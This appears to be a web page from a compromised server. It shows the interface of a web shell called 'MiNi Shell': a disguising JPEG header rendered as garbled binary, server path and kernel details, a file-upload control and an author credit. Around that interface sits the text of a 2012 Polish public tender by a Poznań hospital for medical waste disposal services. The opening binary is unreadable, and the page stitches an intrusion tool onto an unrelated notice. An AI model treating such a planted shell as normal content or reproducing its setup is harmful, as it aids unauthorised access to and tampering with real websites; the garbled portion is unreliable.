JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120730/275796-N-2012.html

<p class="kh_header"><b>Poznań: Sukcesywna usługa utylizacji odpadów medycznych
wraz z transportem i użyczeniem kontenerów dla Szpitala im. Fr. Raszei w Poznaniu oraz dla Ośrodka Leczenia
Uzależnień przy ul. Podolańskiej 46 w Poznaniu</b><br>
<b>Numer ogłoszenia: 275796 - 2012; data zamieszczenia: 30.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Opieki Zdrowotnej Poznań-Jeżyce , ul. Mickiewicza 2, 60-834 Poznań, woj. wielkopolskie, tel. (061) 848 10 11, faks (061) 848 49 90/91.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna usługa utylizacji odpadów medycznych
wraz z transportem i użyczeniem kontenerów dla Szpitala im. Fr. Raszei w Poznaniu oraz dla Ośrodka Leczenia
Uzależnień przy ul. Podolańskiej 46 w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
sukcesywna usługa utylizacji odpadów medycznych wraz z transportem i użyczeniem kontenerów dla Szpitala im.
Fr. Raszei w Poznaniu oraz dla Ośrodka Leczenia Uzależnień przy ul. Podolańskiej 46 w Poznaniu. Szczegółowy
opis przedmiotu zamówienia zawiera Załącznik nr 1 do niniejszej SIWZ stanowiący integralną jej część.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.52.00.00-8, 90.52.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania o udzielenie zamówienia publicznego
Wykonawca nie jest zobowiązany zabezpieczyć składanej oferty wadium. W niniejszym postępowaniu wadium nie
pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Na ofertę składają się następujące dokumenty i załączniki: 1.1. Specyfikacja Techniczna Zamówienia -podpisana przez Wykonawcę (Załącznik nr 1 do SIWZ). 1.2. Formularz oferty - wypełniony i podpisany przez
Wykonawcę (Załącznik nr 2 do SIWZ). 1.3. Oświadczenie o spełnieniu warunków udziału w postępowaniu z art.
22 ust. 1 Ustawy Prawo zamówień publicznych (Załącznik nr 3 do SIWZ). 1.4. Oświadczenie o braku podstaw do
wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Ustawy Prawo zamówień publicznych
(Załącznik nr 4 do SIWZ). 1.5. Wzór umowy (Załącznik nr 5 do SIWZ). 1.6. Formularz oświadczenia I (Załącznik
nr 6 do SIWZ). 1.7. Formularz oświadczenia II (Załącznik nr 7 do SIWZ). 1.8. Wykaz wykonanych/wykonywanych
w ciągu ostatnich trzech lat usług (Załącznik nr 8 do SIWZ) 2. W celu wykazania braku podstaw do wykluczenia z
postępowania o udzielenie zamówienia z art. 24 ust. 1 Ustawy Prawo zamówień publicznych Wykonawca składa
następujące dokumenty: 2.1. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do
rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 Ustawy, wystawionego
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a przypadku osób fizycznych oświadczenie w
zakresie art. 24 ust. 1 pkt 2 Ustawy. 2.2. Dokumenty potwierdzające posiadanie uprawnień - pełnomocnictw osób
składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych. 3. W celu wykazania
spełnienia przez Wykonawcę warunków o których mowa w art. 22 ust. 1 pkt 1 do 3 Ustawy Prawo zamówień
publicznych, należy złożyć następujące dokumenty: 3.1. Aktualna decyzja na zbieranie, transport i
unieszkodliwianie odpadów. Ewentualnie Zamawiający wymaga przedstawienia decyzji, na podstawie której
Wykonawca może świadczyć usługę z pominięciem przepisu art. 9 ust. 3, 4 i 5 ustawy z dnia 29 listopada 2005 r.
o zmianie ustawy o odpadach i o zmianie innych ustaw. 3.2. Wykaz wykonanych, a w przypadku świadczeń
okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania
spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w
tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu
potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie. (Załącznik nr 8 do
SIWZ). Opis wymaganego doświadczenia: Wykonawca w okresie ostatnich trzech lat przed upływem terminu
składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności
jest krótszy - w tym okresie, wykonał co najmniej dwie usługi odpowiadające swoim rodzajem i wartością (na
kwotę brutto dla każdej z usług nie mniejszą niż 250.000,00 zł) usługi stanowiącej przedmiot zamówienia. 3.3.
Oświadczenie następującej treści: Oświadczam, iż odpady medyczne odbierane będą przez przeszkolonych
pracowników własnym transportem przystosowanym do świadczenia tego typu usług i spełniającym wymogi ADR
(zgodnie z Dz. U. z 2001 nr 62 poz. 628 wraz z nowelizacją i ustawą z dnia 19.12.2002 o zmianie ustawy o
odpadach oraz niektórych innych ustaw). 4. W celu potwierdzenia, że oferowana usługa odpowiada wymaganiom
określonym w niniejszej Specyfikacji Istotnych Warunków Zamówienia do oferty należy dołączyć następujące
dokumenty: 4.1. Transport odpadów powinien dokonywać się zgodnie z Ustawą z dnia 28 października 2002 roku
o przewozie drogowym towarów niebezpiecznych (Dz. U. z dnia 28 listopada 2002 roku nr 199 poz. 1671) - tym
samym do oferty należy złożyć oświadczenie następującej treści: Oświadczam, iż wykonywana przeze mnie
usługa będzie zgodna z Ustawą z dnia 28 października 2002 roku o przewozie drogowym towarów
niebezpiecznych (Dz. U. z dnia 28 listopada 2002 roku nr 199 poz. 1671) oraz ze wszelkimi innymi obowiązującymi
przepisami odnośnie transportu i spalania odpadów medycznych i niebezpiecznych. 4.2. Wykonawcy zobowiązani są złożyć oświadczenie o miejscu utylizowania odpadów, albowiem Zamawiający zobowiązany jest przestrzegać
przepisu Ustawy z dnia 27.04.2001 r. o odpadach (Dz. U. 07.39.251): Art. 9. 1. Odpady powinny być w pierwszej
kolejności poddawane odzyskowi lub unieszkodliwiane w miejscu ich powstawania. 2. Odpady, które nie mogą być
poddane odzyskowi lub unieszkodliwiane w miejscu ich powstawania, powinny być, uwzględniając najlepszą
dostępną technikę lub technologię, o której mowa w art. 143 ustawy z dnia 27 kwietnia 2001 r. - Prawo ochrony
środowiska, przekazywane do najbliżej położonych miejsc, w których mogą być poddane odzyskowi lub
unieszkodliwione. 3. Niesegregowane odpady komunalne, pozostałości z sortowania odpadów komunalnych oraz
komunalne osady ściekowe powinny być poddane odzyskowi lub unieszkodliwianiu na obszarze tego
województwa, na którym zostały wytworzone, w instalacjach spełniających wymagania najlepszej dostępnej
techniki lub technologii, o której mowa w art. 143 ustawy z dnia 27 kwietnia 2001 r. - Prawo ochrony środowiska,
lub w miejscach najbliżej położonych miejsca ich wytworzenia. 4. Niesegregowane odpady komunalne,
pozostałości z sortowania odpadów komunalnych oraz komunalne osady ściekowe mogą być poddane odzyskowi
lub unieszkodliwianiu na obszarze województwa innego niż wymienione w ust. 3, jeżeli odległość od miejsca
wytwarzania odpadów do instalacji przeznaczonej do odzysku lub unieszkodliwiania, spełniającej wymagania
najlepszej dostępnej techniki lub technologii, o której mowa w art. 143 ustawy z dnia 27 kwietnia 2001 r. - Prawo
ochrony środowiska, lub miejsca przeznaczonego do tego samego odzysku jest mniejsza niż odległość do
instalacji lub miejsca położonego na obszarze tego samego województwa. 5. Przepisy ust. 3 i 4 stosuje się
odpowiednio do unieszkodliwiania odpadów medycznych o właściwościach zakaźnych, zwanych dalej zakaźnymi
odpadami medycznymi, oraz do unieszkodliwiania odpadów weterynaryjnych o właściwościach zakaźnych,
zwanych dalej zakaźnymi odpadami weterynaryjnymi. W treści niniejszego oświadczenia Wykonawcy zobowiązani są zamieścić powyższą treść art. 9. 5. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej: 5.1.
Zamiast dokumentów, o których mowa w pkt. 2.1. składa dokument lub dokumenty, wystawione w kraju, w którym
ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: - nie otwarto jego likwidacji ani nie
ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 5.2. Jeżeli
w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie
wydaje się dokumentów wskazanych w niniejszym pkt 5 zastępuje się je dokumentem zawierającym oświadczenie
złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu
zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma
siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt 5.
6. Dokumenty wymagane w przypadku składania oferty wspólnej: 6.1. Wykonawcy mogą wspólnie ubiegać się o
udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć
pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
6.2. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt 1.3., 1.4. oraz 2 dla każdego partnera z
osobna, pozostałe dokumenty składane są wspólnie. 7. Postanowienia dotyczące składanych dokumentów: 7.1.
Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w pkt 2 polega na zasobach innych
podmiotów zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z
postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą dokumentów wymienionych w pkt od 2.1.
do 2.2. dotyczących każdego z tych podmiotów, o ile podmioty te będą brały udział w realizacji części zamówienia 7.2. Dokumenty w niniejszym postępowaniu mogą być składane w oryginale lub kopii poświadczonej za zgodność
z oryginałem przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z
oryginałem. 7.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku
podmiotów, o których mowa w pkt. 7.1., kopie dokumentów dotyczących każdego z tych podmiotów winny być
poświadczane za zgodność z oryginałem przez te podmioty. 7.4. Oferta, składane dokumenty oraz oświadczenia
podpisane przez upoważnionego przedstawiciela Wykonawcy wymagają załączenia właściwego pełnomocnictwa
lub umocowania prawnego. 7.5. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na
język polski, poświadczonym przez Wykonawcę. 7.6. Zamawiający może żądać przedstawienia oryginału lub
notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest
nieczytelna lub budzi wątpliwości, co do jej prawdziwości</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.raszeja.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, w
Szpitalu im. Fr. Raszei w Poznaniu przy ul. Mickiewicza 2 (60-834 Poznań), w pokoju nr 361 (Zamówienia
Publiczne) - III piętro Szpitala..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2012 godzina 09:00, miejsce: Siedziba Zamawiającego, w Szpitalu im. Fr. Raszei w Poznaniu przy ul. Mickiewicza 2
(60-834 Poznań), Kancelaria Szpitalna- piwnica szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie dopuszcza możliwości składania ofert częściowych. 2. Zamawiający nie
dopuszcza możliwości składania ofert wariantowych, Zamawiający nie dopuszcza możliwości składania ofert
równoważnych. 3. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej. 4. Informacja na
temat możliwości powierzenia przez Wykonawcę wykonania części lub całości zamówienia podwykonawcom:Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. W takim
przypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza
powierzyć podwykonawcom 5. Wymagania stawiane Wykonawcy: - Wykonawca jest odpowiedzialny za jakość,
zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. - Wymagana jest
należyta staranność przy realizacji zobowiązań umowy, - Określenie przez Wykonawcę telefonów kontaktowych i
numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. -
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania
przedmiotu zamówienia. 6. Rozliczenie pomiędzy stronami odbywać się będzie w złotych polskich. 7. Zamawiający
nie planuje zorganizowania zebrania Wykonawców. 8. Zamawiający nie planuje aukcji elektronicznej. 9.Dla
zapewnienia kompetentnej i rzetelnej oceny ofert oraz uniknięcia subiektywnych składników w ocenie ofert o
wyborze najkorzystniejszej oferty decydować będą poniższe kryteria o następujących wagach procentowych:
Cena oferty ( brutto) - 100 % 10. Sposób oceny ofert: Ocena ofert zostanie przeprowadzona w oparciu o
przedstawione wyżej kryterium i jego wagę. Maksymalna ilość punktów, jaką może osiągnąć oferta, wynosi 100
pkt. Ofertom przyznane zostaną punkty według wzoru: Cena ( brutto) oferty najtańszej Cena =
____________________________ x 100 x 100 % Cena ( brutto ) oferty badanej 11. Wynik - oferta, która
przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria)
zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych
punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą ilość
punktów. 12. Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania obowiązku
podatkowego dla Zamawiającego, zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz wspólnotowego nabycia towarów, doliczy do przedstawionej w niej ceny należny podatek od towarów i
usług zgodnie z obowiązującymi w przedmiocie zamówienia przepisami prawa. Realizacja zamówienia zostanie
powierzona Wykonawcy, którego oferta uzyska najwyższą ilość punktów. 13. W przypadku, gdy nie będzie
możliwy wybór oferty najkorzystniejszej ze względu na to, że zostały złożone oferty o takiej samej cenie,
Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez
Zamawiającego ofert dodatkowych. 14. Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej w celu
wyboru najkorzystniejszej spośród ofert uznanych za ważne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com